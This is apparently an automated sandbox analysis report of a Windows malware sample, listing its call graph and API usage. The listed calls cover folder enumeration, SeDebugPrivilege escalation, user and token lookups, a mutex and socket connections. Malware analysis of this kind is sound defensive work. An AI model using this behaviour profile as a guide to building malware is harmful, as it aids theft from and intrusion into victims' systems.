402bab 2 API calls 10505->10506 10507 403f69 10506->10507 10508 403bef 5 API calls 10507->10508 10508->10475 10510 4031e5 4 API calls 10509->10510 10511 403c01 FindClose 10510->10511 10511->10481 10698 4049dc 10699 4031e5 4 API calls 10698->10699 10700 4049ef SHEnumKeyExW 10699->10700 11370 40cddd 11371 405b6f 6 API calls 11370->11371 11372 40cdee 11371->11372 11373 40ce06 11372->11373 11374 413a58 14 API calls 11372->11374 11375 405b6f 6 API calls 11373->11375 11383 40ce59 11373->11383 11376 40ce00 11374->11376 11377 40ce1c 11375->11377 11378 402bab 2 API calls 11376->11378 11379 40ce52 11377->11379 11380 403d74 11 API calls 11377->11380 11377->11383 11378->11373 11381 402bab 2 API calls 11379->11381 11382 40ce45 11380->11382 11381->11383 11382->11379 11384 402bab 2 API calls 11382->11384 11384->11379 10701 40ecde 10702 412093 13 API calls 10701->10702 10703 40ecfd 10702->10703 10704 412093 13 API calls 10703->10704 10705 40ed0d 10704->10705 10709 40e8df 10710 412093 13 API calls 10709->10710 10711 40e8f8 10710->10711 10712 412093 13 API calls 10711->10712 10713 40e908 10712->10713 10720 404b22 10713->10720 10715 40e91c 10716 40e936 10715->10716 10719 40e93d 10715->10719 10727 40e944 10715->10727 10718 402bab 2 API calls 10716->10718 10718->10719 10721 402b7c 2 API calls 10720->10721 10723 404b33 10721->10723 10722 404b66 10722->10715 10723->10722 10736 4049b3 10723->10736 10725 404b5f 10725->10722 10726 402bab 2 API calls 10725->10726 10726->10722 10728 4056bf 2 API calls 10727->10728 10729 40e952 10728->10729 10730 40e976 10729->10730 10731 4057df 14 API calls 10729->10731 10730->10716 10732 40e966 10731->10732 10733 413aca 4 API calls 10732->10733 10734 40e970 10733->10734 10735 405695 2 API calls 10734->10735 10735->10730 10737 4031e5 4 API calls 10736->10737 10738 4049c6 SHGetValueW 10737->10738 10738->10725 10739 4139de 10748 413855 10739->10748 10741 4139f1 10742 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10741->10742 10743 4139f7 10742->10743 10744 413866 66 API calls 10743->10744 10745 413a2d 10744->10745 10746 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10745->10746 10747 413a34 10746->10747 10749 4031e5 4 API calls 10748->10749 10750 413864 10749->10750 10750->10750 11390 4116e7 11391 4117ba 11390->11391 11392 405b6f 6 API calls 11391->11392 11397 4117f1 11391->11397 11393 4117d0 11392->11393 11394 404cbf 9 API calls 11393->11394 11393->11397 11395 4117eb 11394->11395 11396 402bab 2 API calls 11395->11396 11396->11397 10770 4094e7 10771 404b22 7 API calls 10770->10771 10772 4094fe 10771->10772 10773 409554 10772->10773 10774 405b6f 6 API calls 10772->10774 10775 409514 10774->10775 10777 404b22 7 API calls 10775->10777 10781 40954d 10775->10781 10776 402bab 2 API calls 10776->10773 10778 40952d 10777->10778 10780 409408 18 API calls 10778->10780 10784 409544 10778->10784 10779 402bab 2 API calls 10779->10781 10782 40953e 10780->10782 10781->10776 10783 402bab 2 API calls 10782->10783 10783->10784 10784->10779 11439 40d4ea 11440 404bee 7 API calls 11439->11440 11441 40d500 11440->11441 11442 40d5a0 11441->11442 11443 404bee 7 API calls 11441->11443 11444 40d529 11443->11444 11445 404bee 7 API calls 11444->11445 11446 40d537 11445->11446 11447 404bee 7 API calls 11446->11447 11448 40d546 11447->11448 11448->11442 11449 405872 4 API calls 11448->11449 11450 40d56d 11449->11450 11451 405872 4 API calls 11450->11451 11452 40d57c 11451->11452 11453 405872 4 API calls 11452->11453 11454 40d58e 11453->11454 11455 405872 4 API calls 11454->11455 11455->11442 11456 4058ea 11457 4031e5 4 API calls 11456->11457 11458 4058fd 11457->11458 11459 40a3ea 11460 40374e 6 API calls 11459->11460 11461 40a403 11460->11461 11462 40a419 11461->11462 11463 4059d8 4 API calls 11461->11463 11464 40a411 11463->11464 11465 402bab 2 API calls 11464->11465 11465->11462 10830 404df3 WSAStartup 10834 4091f6 10835 404b22 7 API calls 10834->10835 10836 40920b 10835->10836 10837 409222 10836->10837 10838 409408 18 API calls 10836->10838 10839 40921c 10838->10839 10840 402bab 2 API calls 10839->10840 10840->10837 11492 4117fe 11493 404c4e 6 API calls 11492->11493 11494 411888 11493->11494 11495 404c4e 6 API calls 11494->11495 11499 411925 11494->11499 11496 4118ab 11495->11496 11496->11499 11511 4119b3 11496->11511 11498 4118c5 11500 4119b3 4 API calls 11498->11500 11501 4118d0 11500->11501 11501->11499 11502 4056bf 2 API calls 11501->11502 11503 4118fd 11502->11503 11504 405872 4 API calls 11503->11504 11505 41190a 11504->11505 11506 405872 4 API calls 11505->11506 11507 411915 11506->11507 11508 413aca 4 API calls 11507->11508 11509 41191f 11508->11509 11510 405695 2 API calls 11509->11510 11510->11499 11512 4119c6 11511->11512 11514 4119bf 11511->11514 11513 4031e5 4 API calls 11512->11513 11513->11514 11514->11498 10844 40e880 10845 41219c 15 API calls 10844->10845 10846 40e88e 10845->10846 10847 41219c 15 API calls 10846->10847 10848 40e89c 10847->10848 11578 40e48a 11579 404bee 7 API calls 11578->11579 11581 40e4d0 11579->11581 11580 40e4f4 11581->11580 11582 405872 4 API calls 11581->11582 11582->11580 10945 410390 10946 404b22 7 API calls 10945->10946 10947 4103a5 10946->10947 10948 410409 10947->10948 10949 405b6f 6 API calls 10947->10949 10953 4103ba 10949->10953 10950 402bab 2 API calls 10950->10948 10951 402bab 2 API calls 10952 410402 10951->10952 10952->10950 10953->10952 10954 403d74 11 API calls 10953->10954 10957 4103fb 10953->10957 10955 4103ee 10954->10955 10956 402bab 2 API calls 10955->10956 10955->10957 10956->10957 10957->10951 11593 40ed96 11594 4040bb 13 API calls 11593->11594 11599 40edb0 11594->11599 11595 40ef90 11596 403f9e 5 API calls 11596->11595 11597 405ae9 6 API calls 11597->11599 11598 412269 6 API calls 11598->11599 11599->11595 11599->11597 11599->11598 11600 40ef61 11599->11600 11601 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 11599->11601 11607 402bab GetProcessHeap HeapFree 11599->11607 11608 40ef87 11599->11608 11602 402bab 2 API calls 11600->11602 11604 40ef6e 11600->11604 11601->11599 11602->11604 11603 402bab 2 API calls 11605 40ef7c 11603->11605 11604->11603 11604->11605 11606 402bab 2 API calls 11605->11606 11605->11608 11606->11608 11607->11599 11608->11596 11609 40ef98 11610 404c4e 6 API calls 11609->11610 11611 40efb6 11610->11611 11612 40f02a 11611->11612 11624 40f054 11611->11624 11615 404bee 7 API calls 11616 40efda 11615->11616 11617 404bee 7 API calls 11616->11617 11618 40efe9 11617->11618 11618->11612 11619 405872 4 API calls 11618->11619 11620 40f008 11619->11620 11621 405872 4 API calls 11620->11621 11622 40f01a 11621->11622 11623 405872 4 API calls 11622->11623 11623->11612 11625 40f064 11624->11625 11626 402b7c 2 API calls 11625->11626 11628 40f072 11626->11628 11627 40efca 11627->11615 11628->11627 11630 405ecd 11628->11630 11631 4059b8 4 API calls 11630->11631 11632 405edf 11631->11632 11632->11628 10964 410c98 10965 41219c 15 API calls 10964->10965 10966 410ca8 10965->10966 10967 41219c 15 API calls 10966->10967 10968 410cb5 10967->10968 10969 412093 13 API calls 10968->10969 10970 410cc9 10969->10970 11702 41249c 11703 4056bf 2 API calls 11702->11703 11704 4124aa 11703->11704 11705 4057df 14 API calls 11704->11705 11710 4124ce 11704->11710 11706 4124be 11705->11706 11707 413aca 4 API calls 11706->11707 11708 4124c8 11707->11708 11709 405695 2 API calls 11708->11709 11709->11710 10974 40f49e 10975 40f4b6 14 API calls 10974->10975 10976 40f4a8 10975->10976 10977 40929e 10978 413b28 7 API calls 10977->10978 10979 4092a4 10978->10979 10980 405b6f 6 API calls 10979->10980 10981 4092af 10980->10981 10982 4092c5 10981->10982 10983 409408 18 API calls 10981->10983 10984 4092bf 10983->10984 10985 402bab 2 API calls 10984->10985 10985->10982 11811 407fa4 11812 407fb7 11811->11812 11813 402b7c 2 API calls 11812->11813 11815 407fee 11812->11815 11814 40800d 11813->11814 11814->11815 11816 4037be 4 API calls 11814->11816 11817 40803c 11816->11817 11818 402bab 2 API calls 11817->11818 11818->11815 11019 4090aa 11020 404b22 7 API calls 11019->11020 11021 4090c1 11020->11021 11022 4090d8 11021->11022 11023 409408 18 API calls 11021->11023 11024 404b22 7 API calls 11022->11024 11025 4090d2 11023->11025 11026 4090eb 11024->11026 11027 402bab 2 API calls 11025->11027 11028 408c4d 17 API calls 11026->11028 11031 409104 11026->11031 11027->11022 11029 4090fe 11028->11029 11030 402bab 2 API calls 11029->11030 11030->11031 11038 409cae 11053 404b79 11038->11053 11040 409cc5 11042 405b6f 6 API calls 11040->11042 11043 409d2f 11040->11043 11045 409d27 11040->11045 11041 402bab 2 API calls 11041->11043 11044 409cec 11042->11044 11044->11045 11046 404b79 7 API calls 11044->11046 11045->11041 11047 409d05 11046->11047 11048 409d1e 11047->11048 11049 408c4d 17 API calls 11047->11049 11050 402bab 2 API calls 11048->11050 11051 409d18 11049->11051 11050->11045 11052 402bab 2 API calls 11051->11052 11052->11048 11054 404b22 7 API calls 11053->11054 11055 404b8a 11054->11055 11055->11040 11862 411fb3 11863 405b6f 6 API calls 11862->11863 11865 412013 11863->11865 11864 412075 11865->11864 11869 41206a 11865->11869 11881 411a8d 11865->11881 11867 402bab 2 API calls 11867->11864 11869->11867 11870 4056bf 2 API calls 11871 41203d 11870->11871 11872 405872 4 API calls 11871->11872 11873 41204a 11872->11873 11874 413aca 4 API calls 11873->11874 11875 412054 11874->11875 11876 405695 2 API calls 11875->11876 11877 41205a 11876->11877 11878 413a58 14 API calls 11877->11878 11879 412064 11878->11879 11880 402bab 2 API calls 11879->11880 11880->11869 11882 402b7c 2 API calls 11881->11882 11883 411aa3 11882->11883 11902 411f05 11883->11902 11904 404ada 11883->11904 11886 404ada 4 API calls 11887 411cad 11886->11887 11888 411f0c 11887->11888 11889 411cc0 11887->11889 11890 402bab 2 API calls 11888->11890 11907 405eb6 11889->11907 11890->11902 11892 411d3c 11893 4031e5 4 API calls 11892->11893 11894 411d7b 11893->11894 11895 411ea6 11894->11895 11901 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 11894->11901 11903 405eb6 4 API calls 11894->11903 11896 4031e5 4 API calls 11895->11896 11897 411eb5 11896->11897 11898 4031e5 4 API calls 11897->11898 11899 411ed6 11898->11899 11900 405eb6 4 API calls 11899->11900 11900->11902 11901->11894 11902->11869 11902->11870 11903->11894 11905 4031e5 4 API calls 11904->11905 11906 404afd 11905->11906 11906->11886 11908 405998 4 API calls 11907->11908 11909 405ec8 11908->11909 11909->11892 11085 40f6b8 11086 41219c 15 API calls 11085->11086 11087 40f6c7 11086->11087 11088 41219c 15 API calls 11087->11088 11089 40f6d5 11088->11089 11090 41219c 15 API calls 11089->11090 11091 40f6df 11090->11091 11110 40d6bd 11111 4056bf 2 API calls 11110->11111 11112 40d6c9 11111->11112 11123 404cbf 11112->11123 11115 404cbf 9 API calls 11116 40d6f4 11115->11116 11117 404cbf 9 API calls 11116->11117 11118 40d702 11117->11118 11119 413aca 4 API calls 11118->11119 11120 40d711 11119->11120 11121 405695 2 API calls 11120->11121 11122 40d71f 11121->11122 11124 402b7c 2 API calls 11123->11124 11125 404ccd 11124->11125 11126 404ddc 11125->11126 11127 404b8f 5 API calls 11125->11127 11126->11115 11128 404ce4 11127->11128 11129 404dd4 11128->11129 11131 402b7c 2 API calls 11128->11131 11130 402bab 2 API calls 11129->11130 11130->11126 11141 404d04 11131->11141 11132 404dcc 11133 404a39 5 API calls 11132->11133 11133->11129 11134 404dc6 11135 402bab 2 API calls 11134->11135 11135->11132 11136 402b7c 2 API calls 11136->11141 11137 404b8f 5 API calls 11137->11141 11138 402bab GetProcessHeap HeapFree 11138->11141 11139 404a39 5 API calls 11139->11141 11140 405b6f 6 API calls 11140->11141 11141->11132 11141->11134 11141->11136 11141->11137 11141->11138 11141->11139 11141->11140 11142 404cbf 9 API calls 11141->11142 11144 40d726 11141->11144 11142->11141 11160 404bee 11144->11160 11147 405872 4 API calls 11150 40d761 11147->11150 11148 404bee 7 API calls 11148->11150 11149 405872 4 API calls 11149->11150 11150->11148 11150->11149 11152 40d971 11150->11152 11153 405781 4 API calls 11152->11153 11158 40d9bb 11152->11158 11168 404ba7 11152->11168 11153->11152 11155 405781 4 API calls 11155->11158 11157 405872 4 API calls 11157->11158 11158->11155 11158->11157 11159 40db63 11158->11159 11171 404c4e 11158->11171 11178 4037be 11158->11178 11159->11141 11161 402b7c 2 API calls 11160->11161 11162 404bff 11161->11162 11163 404c3b 11162->11163 11164 4031e5 4 API calls 11162->11164 11163->11147 11163->11159 11165 404c28 SHQueryValueExW 11164->11165 11165->11163 11166 404c3f 11165->11166 11167 402bab 2 API calls 11166->11167 11167->11163 11169 4031e5 4 API calls 11168->11169 11170 404bca 11169->11170 11170->11152 11172 402b7c 2 API calls 11171->11172 11173 404c60 11172->11173 11174 404ca4 11173->11174 11175 4031e5 4 API calls 11173->11175 11174->11158 11176 404c8d 11175->11176 11176->11174 11177 402bab 2 API calls 11176->11177 11177->11174 11179 4031e5 4 API calls 11178->11179 11180 4037e2 11179->11180 11181 40382b 11180->11181 11182 402b7c 2 API calls 11180->11182 11181->11158 11183 403802 11182->11183 11184 403832 11183->11184 11186 403809 11183->11186 11185 4036a3 4 API calls 11184->11185 11185->11181 11187 4036a3 4 API calls 11186->11187 11187->11181 11188 40f0bf 11189 4056bf 2 API calls 11188->11189 11190 40f0c9 11189->11190 11191 40f115 11190->11191 11192 404cbf 9 API calls 11190->11192 11193 41219c 15 API calls 11191->11193 11194 40f0ed 11192->11194 11195 40f128 11193->11195 11196 404cbf 9 API calls 11194->11196 11197 40f0fb 11196->11197 11198 413aca 4 API calls 11197->11198 11199 40f10a 11198->11199 11200 405695 2 API calls 11199->11200 11200->11191

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 296 403d74-403d90 call 4067c4 299 403d96-403da9 call 405b6f 296->299 300 403ea9-403ec0 call 405b6f 296->300 305 403ea6-403ea8 299->305 306 403daf-403dcb call 4031e5 FindFirstFileW 299->306 307 403f95 300->307 308 403ec6-403ee2 call 4031e5 FindFirstFileW 300->308 305->300 314 403dd1-403dd8 306->314 315 403e9d-403ea4 call 402bab 306->315 309 403f97-403f9d 307->309 316 403ee8-403ef8 call 405d24 308->316 317 403f8e-403f94 call 402bab 308->317 319 403e75-403e90 call 4031e5 FindNextFileW 314->319 320 403dde-403de2 314->320 315->305 332 403f03-403f0a 316->332 333 403efa-403f01 316->333 317->307 319->314 339 403e96-403e97 call 403bef 319->339 324 403e12-403e22 call 405d24 320->324 325 403de4-403df9 call 405eff 320->325 342 403e30-403e4c call 405b6f 324->342 343 403e24-403e2e 324->343 325->319 345 403dfb-403e10 call 405eff 325->345 335 403f12-403f2d call 405b6f 332->335 336 403f0c-403f10 332->336 333->332 334 403f41-403f5c call 4031e5 FindNextFileW 333->334 353 403f87-403f88 call 403bef 334->353 354 403f5e-403f61 334->354 335->334 351 403f2f-403f33 335->351 336->334 336->335 346 403e9c 339->346 342->319 358 403e4e-403e6f call 403d74 call 402bab 342->358 343->319 343->342 345->319 345->324 346->315 356 403f75-403f85 call 402bab call 403bef 351->356 357 403f35-403f40 call 402bab 351->357 362 403f8d 353->362 354->316 356->309 357->334 358->319 372 403f63-403f73 call 402bab call 403bef 358->372 362->317 372->309
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNext
                                                                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                              • API String ID: 1690352074-2009209621
                                                                                              • Opcode ID: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
                                                                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                              • Opcode Fuzzy Hash: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
                                                                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 3615134276-2896544425
                                                                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1357844191-0
                                                                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                                                                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 377 4061c3-4061f2 call 402bf2 call 4031e5 383 4061f4-4061ff GetLastError 377->383 384 40622a-40623b call 402b7c 377->384 386 406201-406203 383->386 387 406208-406228 call 4060ac call 4031e5 383->387 391 40624c-406258 call 402b7c 384->391 392 40623d-406249 call 40338c 384->392 389 406329-40632e 386->389 387->384 387->386 400 406269-406290 call 4031e5 GetTokenInformation 391->400 401 40625a-406266 call 40338c 391->401 392->391 407 406292-4062a0 call 402b7c 400->407 408 4062fe-406302 400->408 401->400 407->408 417 4062a2-4062b9 call 406086 407->417 410 406304-406307 call 403c40 408->410 411 40630d-40630f 408->411 416 40630c 410->416 414 406311-406317 call 402bab 411->414 415 406318-40631e 411->415 414->415 419 406320-406326 call 402bab 415->419 420 406327 415->420 416->411 426 4062f5-4062fd call 402bab 417->426 427 4062bb-4062e4 call 4031e5 LookupAccountSidW 417->427 419->420 420->389 426->408 427->426 432 4062e6-4062f3 call 405b6f 427->432 432->426
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                              • _wmemset.LIBCMT ref: 00406244
                                                                                              • _wmemset.LIBCMT ref: 00406261
                                                                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _wmemset$AccountErrorInformationLastLookupToken
                                                                                              • String ID: IDA$IDA
                                                                                              • API String ID: 3235442692-2020647798
                                                                                              • Opcode ID: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
                                                                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                              • Opcode Fuzzy Hash: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
                                                                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 763 404e17-404e57 getaddrinfo 764 404e59-404e5b 763->764 765 404e5d-404e84 call 402b7c socket 763->765 766 404ecf-404ed3 764->766 769 404e86-404e96 call 402bab freeaddrinfo 765->769 770 404e98-404ea7 connect 765->770 779 404ec7-404ec9 769->779 772 404eb3-404ebe freeaddrinfo 770->772 773 404ea9-404eb1 call 404de5 770->773 776 404ec0-404ec6 call 402bab 772->776 777 404ecb 772->777 773->772 776->779 778 404ecd-404ece 777->778 778->766 779->778
                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: freeaddrinfogetaddrinfosocket
                                                                                              • String ID:
                                                                                              • API String ID: 2479546573-0
                                                                                              • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                              • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 783 4040bb-4040f2 call 4031e5 CreateFileW 786 4040f8-404111 call 4031e5 783->786 787 40418d-404190 783->787 797 404113-404119 786->797 798 40417a 786->798 788 404192-4041a7 call 403c90 787->788 789 404184 787->789 788->789 796 4041a9-4041b8 call 403c59 788->796 792 404186-40418c 789->792 806 4041ba-4041d8 call 4040bb call 403d44 796->806 807 4041db-4041e4 call 402bab 796->807 797->798 801 40411b-404120 797->801 800 40417d-40417e call 403c40 798->800 808 404183 800->808 804 404122 801->804 805 404124-404140 call 4031e5 VirtualAlloc 801->805 804->805 805->798 816 404142-40415e call 4031e5 ReadFile 805->816 806->807 807->792 808->789 816->800 820 404160-404178 call 4031e5 816->820 820->800
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$AllocCreateReadVirtual
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 3585551309-2986845003
                                                                                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                              • GetLastError.KERNEL32 ref: 0041399E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Error$CreateLastModeMutex
                                                                                              • String ID:
                                                                                              • API String ID: 3448925889-0
                                                                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CreatePointerWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3672724799-0
